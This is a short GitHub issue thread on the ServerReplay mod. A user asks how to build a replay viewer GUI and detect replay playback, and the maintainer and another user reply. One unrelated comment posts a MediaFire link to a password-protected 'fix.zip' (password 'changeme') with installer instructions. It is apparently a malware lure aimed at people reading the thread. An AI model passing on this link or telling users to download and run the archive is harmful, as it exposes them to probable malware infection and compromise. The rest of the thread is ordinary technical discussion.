### ISSUE TITLE
Feature Request: How would I code a Replay Viewer Gui

### ISSUE THREAD

**Issue by copyandexecute** [senseiwells/ServerReplay#57]
there is no inventory, is there a way to inject into it? or how do I know that im watching a replay can you provide events to this please

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by senseiwells** [comment]
Can you please expand on your request?
What exactly are you trying to do?

**Comment by Tunga-Tech** [comment]
> there is no inventory, is there a way to inject into it? or how do I know that im watching a replay can you provide events to this please

So there's this cool mod called the ReplayMod that lets you replay your recordings. . .
